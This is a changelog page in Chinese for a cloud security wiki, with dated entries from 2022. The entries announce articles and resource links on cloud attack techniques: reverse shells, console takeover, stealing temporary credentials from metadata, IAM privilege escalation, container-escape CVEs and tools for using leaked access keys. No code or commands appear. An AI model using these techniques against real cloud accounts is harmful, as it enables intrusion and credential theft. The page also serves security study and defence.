<li>Alibaba Cloud Certified Associate, ACA</li>
<li>Azure Security Engineer Associate</li>
<li>AWS Certified Security - Specialty</li>
<li>Certified Cloud Security Professional, CCSP</li>
<li>CompTIA Cloud+</li>
<li>GCP Professional Cloud Security Engineer</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.9.21
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>Azure Cloud Shell 命令注入窃取用户的访问令牌</li>
<li>Gafnit Amiga 的个人博客</li>
<li>Nick Frichette 的个人博客</li>
<li>Chris Farris 的个人博客</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.9.15
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云渗透信息收集工具 cloudfox</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.9.14
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《记录一次平平无奇的云上攻防过程》<a href="/CF/Cases/cfCase2.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>记录一次平平无奇的云上攻防过程</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.9.7
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>CF 发布 <a href="https://github.com/teamssix/cf/releases/tag/v0.4.0" target="_blank">v0.4.0</a> 版本,更新<a href="/CF/" target="_blank"> CF 使用手册 </a>板块
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.8.15
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>AWS 靶场 AWSGoat</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.8.12
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>福布斯 Cloud 100</li>
<li>云计算隔离问题:PostgreSQL 的漏洞影响到多个云计算供应商</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《本地部署》<a href="/About/LocalDeployment.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.8.11
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>2021 年云安全事件回顾</li>
<li>Christophe Tafani-Dereeper 博客</li>
<li>Google Cloud Shell 命令注入</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.8.10
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>Lightspin 2022 年 7 大云攻击路径</li>
<li>安全大道资讯</li>
<li>Deepfence 博客</li>
<li>Lacework 博客</li>
<li>Humanitec 博客</li>
<li>Orca 博客</li>
<li>Praetorian 博客</li>
<li>Ermetic 博客</li>
<li>云安全入门资料</li>
<li>云服务漏洞库</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.18
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《一键查看安全组》<a href="/CF/ECS/vpc.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.14
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《利用 aws cli 执行命令》<a href="/CloudService/EC2/ec2-exec-command.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.13
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《我用 CF 打穿了他的云上内网》<a href="/CF/Cases/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.11
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《下载存储桶里的对象》<a href="/CF/OSS/getObjects.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.10
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《列出存储桶里的对象》<a href="/CF/OSS/lsObjects.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.8
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《列出当前凭证权限》<a href="/CF/RAM/lsPermissions.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.7
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「一生热爱」师傅补充的文库信息,感谢「一生热爱」师傅贡献的以下文章:
<br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《CVE-2016-5195》<a href="/CloudNative/Docker/CVE-2016-5195.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《CVE-2019-16884》<a href="/CloudNative/Docker/CVE-2019-16884.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《CVE-2021-3493》<a href="/CloudNative/Docker/CVE-2021-3493.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《CVE-2021-22555》<a href="/CloudNative/Docker/CVE-2021-22555.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《CVE-2022-0492》<a href="/CloudNative/Docker/CVE-2022-0492.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《CVE-2022-0847》<a href="/CloudNative/Docker/CVE-2022-0847.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《CVE-2022-23222》<a href="/CloudNative/Docker/CVE-2022-23222.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Docker 用户提权》<a href="/CloudNative/Docker/docker-user-group-privilege-escalation.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「一生热爱」师傅,感谢「一生热爱」师傅的贡献。<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.5
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云环境利用框架 CF</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《一键接管控制台》<a href="/CF/RAM/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.4
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《列出云数据库》<a href="/CF/RDS/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.7.1
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《列出所有服务》<a href="/CF/More/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《列出所有的区域》<a href="/CF/More/regions.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《刷新缓存》<a href="/CF/More/flushCache.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《调整输出的信息等级》<a href="/CF/More/logLevel.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《查看版本信息》<a href="/CF/More/version.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《查看帮助信息》<a href="/CF/More/help.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《关于作者》<a href="/CF/More/aboutMe.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《自动更新》<a href="/CF/More/upgrade.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.6.30
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>增加<a href="/CF/" target="_blank"> CF 使用手册 </a>板块
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《配置访问凭证》<a href="/CF/Configuration/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《列出对象存储服务》<a href="/CF/OSS/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《列出弹性计算服务》<a href="/CF/ECS" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《在实例上执行命令》<a href="/CF/ECS/exec.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《一键执行三要素》<a href="/CF/ECS/batchCommand.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《一键获得临时访问凭证》<a href="/CF/ECS/metaDataSTSToken.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《一键获得用户数据》<a href="/CF/ECS/userData.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《反弹 Shell》<a href="/CF/ECS/reverseShell.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.6.16
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Terraform 在线可视化》<a href="/CloudNative/Terraform/terraform-visualization-online.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>Terraform 可视化</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.6.10
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库迁移到 Netlify<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「想走安全的小白」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>开源多云安全合规扫描平台 RiskScanner</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「想走安全的小白」师傅,感谢支持<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「Esonhugh」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>腾讯云官方 COS 辅助工具</li>
<li>阿里云/腾讯云 AK 资源管理工具</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「Esonhugh」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.6.7
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>从云服务器 SSRF 漏洞到接管你的阿里云控制台</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《从云服务器 SSRF 漏洞到接管你的阿里云控制台》<a href="/CloudService/EC2/aliyun-console-takeover.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.30
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云服务安全漏洞汇总</li>
<li>基于终端 UI 的 k8s 集群管理工具 k9s</li>
<li>从零开始的 Kubernetes 攻防</li>
<li>初探 eBPF</li>
<li>KubeCon + CloudNativeCon Europe 2022 相关视频</li>
<li>火线云安全沙龙视频</li>
<li>《Hacking Kubernetes》</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Terraform 使用入门以及在云上攻防中的作用》<a href="/CloudNative/Terraform/terraform-introductory.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.29
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>CNCF 云原生安全白皮书 v2</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「tanger」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>腾讯云轻量服务器管理工具</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「tanger」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.16
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云上攻防:RED TEAMING FOR CLOUD</li>
<li>云上攻防二三事(续)</li>
<li>AWS 控制台接管利用工具 aws_consoler</li>
<li>云上公开资产枚举 CloudBrute</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.13
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>k8s 调试辅助工具 validkube</li>
<li>Bridgecrew Blog(英文)</li>
<li>浅析 K8S 各种未授权攻击方法</li>
<li>Trend Micro Blog(英文)</li>
<li>企业迁移到公有云之前要问的5个问题</li>
<li>在 AWS 下查看自己所拥有的权限</li>
<li>APISIX CVE-2022-29266 漏洞分析与复现</li>
<li>保障云和容器安全的十个注意事项(英文)</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.11
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《S3 任意文件上传》<a href="/CloudService/S3/unrestricted-file-upload.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Bucket Object 遍历》<a href="/CloudService/S3/bucket-object-traversal.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.8
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《RDS 信息收集》<a href="/CloudService/RDS/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《MSSQL 读取实例信息》<a href="/CloudService/RDS/mssql-bulk-insert.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《PostgreSQL 数据库 SSRF》<a href="/CloudService/RDS/postgresql-ssrf.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《利用 IAM 进行权限提升》<a href="/CloudService/IAM/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《利用 IAM 进行权限维持》<a href="/CloudService/IAM/iam-persistence.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.7
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《在 AWS 下查看自己所拥有的权限》<a href="/CloudService/IAM/list-attached-user-policies.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「da Vinci【达文西】」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云安全态势管理工具 CloudSploit</li>
<li>Azure 红队利用工具 Stormspotter</li>
<li>GCP IAM 权限提升方法 GCP-IAM-Privilege-Escalation</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「da Vinci【达文西】」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.6
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>Rhino Security Labs Blog(英文)</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.5.5
<br>
<template>
<a-timeline> <a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「Idle Life」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>开源云原生安全防护平台 neuvector</li>
</ul>
</p>
</a-timeline-item> <a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「m4d3bug」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>k8s 安全风险检测工具 StackRox</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「m4d3bug」师傅,感谢支持<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>火线云安全知识库</li>
<li>多云靶场搭建工具 TerraformGoat</li>
<li>Cloud Security Wiki(英文)</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.30
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《APISIX CVE-2022-29266 漏洞分析与复现》<a href="/CloudNative/APISIX/apisix-cve-2022-29266.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>WIZ 博客(英文)</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.28
<br>
<template>
<a-timeline> <a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「zxynull」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>Container Security Checklist</li>
<li>Docker 核心技术与实现原理</li>
<li>浅谈 Linux Cgroup机制</li>
<li>使用 eBPF 逃逸容器技术分析与实践</li>
<li>内核态 eBPF 程序实现容器逃逸与隐藏账号 rootkit</li>
<li>基于 eBPF 实现容器运行时安全</li>
<li>Linux 云计算网络</li>
<li>腾讯玄武实验室</li>
<li>云原生技术社区</li>
<li>进击云原生</li>
<li>一个支持在线分析容器镜像的网站 contains</li>
<li>可以检测镜像、文件系统、git 存储库的漏洞以及配置问题的镜像扫描工具 trivy</li>
<li>容器镜像漏洞静态扫描工具 Clair</li>
<li>用于深度分析 docker 镜像,扫描容器镜像和文件系统中的漏洞的工具 Anchore</li>
<li>用于对 docker 镜像和容器中的木马、恶意软件、病毒等已知漏洞进行静态分析工具 Dagda</li>
<li>一种运行时安全工具,用于检测在 Kubernetes 上运行的主机和容器中的异常活动 Falco</li>
<li>带有多个自动化测试的脚本,用于检查在生产环境中部署容器的最佳实践 Docker_Bench_Security</li>
<li>原生支持云云原生通用性系统可见性工具 sysdig</li>
<li>容器镜像分析工具 DIVE</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「zxynull」师傅,感谢支持<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>Sysdig 博客(英文)</li>
<li>容器相关期刊(英文)</li>
<li>DevOps 安全博客(英文)</li>
<li>Aqua 博客(英文)</li>
<li>Lightspin 博客(英文)</li>
<li>CNCF 博客(英文)</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.26
<br>
<template>
<a-timeline> <a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「zhengjim」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>CIS 基准检测手册(英文)</li>
<li>CIS 基准检测工具 kube bench</li>
<li>k8s 集群安全漏洞发现工具 kube hunter</li>
<li>k8s 安全审计工具 kubestriker</li>
<li>基于 kubectl 的红队 k8s 安全评估工具 red kube</li>
<li>容器利用工具 CCAT</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「zhengjim」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.25
<br>
<template>
<a-timeline> <a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「Idle Life」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>k8s 渗透测试工具 Peirates</li>
<li>容器渗透测试工具 BOtB</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「Idle Life」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.21
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「UzJu」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>k8s 集群风险权限扫描工具 KubiScan</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.20
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>利用 AWS 官方对 log4j 漏洞的热补丁实现容器逃逸(英文)</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.19
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>云安全交流群满 200 人 🎉 <br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/About/" target="_blank"> 关于文库 </a>板块<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.18
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「UzJu」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>K8s 靶场部署工具 Kubernetes Goat</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「UzJu」师傅,感谢支持<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>公有云 IP 重用的威胁和防御方法分析 Paper(英文)</li>
<li>华为云 CTF cloud 非预期解之 k8s 渗透实战</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.16
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>T Wiki 正式对外宣传<br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「1derian」和「ShangRui-hash」师傅联合补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>AWS AccessKey 泄漏利用工具 awsKeyTools</li>
</ul>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「半人间丶」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>阿里云 AccessKey 利用工具 aliyun-accesskey-Tools</li>
<li>阿里云 ECS、策略组辅助小工具 alicloud-tools</li>
<li>阿里云官方 OSS 浏览工具</li>
<li>阿里云 AccessKey 泄漏利用工具 AliyunAccessKeyTools</li>
<li>在线多云管理平台 行云管家</li>
<li>云存储管理客户端 qiniuClient</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「1derian」、「ShangRui-hash」和 「半人间丶」三位师傅,感谢支持<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>腾讯云 AccessKey 利用工具 Tencent_Yun_tools</li>
<li>容器逃逸检测工具 container-escape-check</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.15
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>配置到 <a href="https://wiki.teamssix.com" target="_blank"> wiki.teamssix.com </a> 域名上<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>部署到 Github 上,T Wiki 公开<br/>
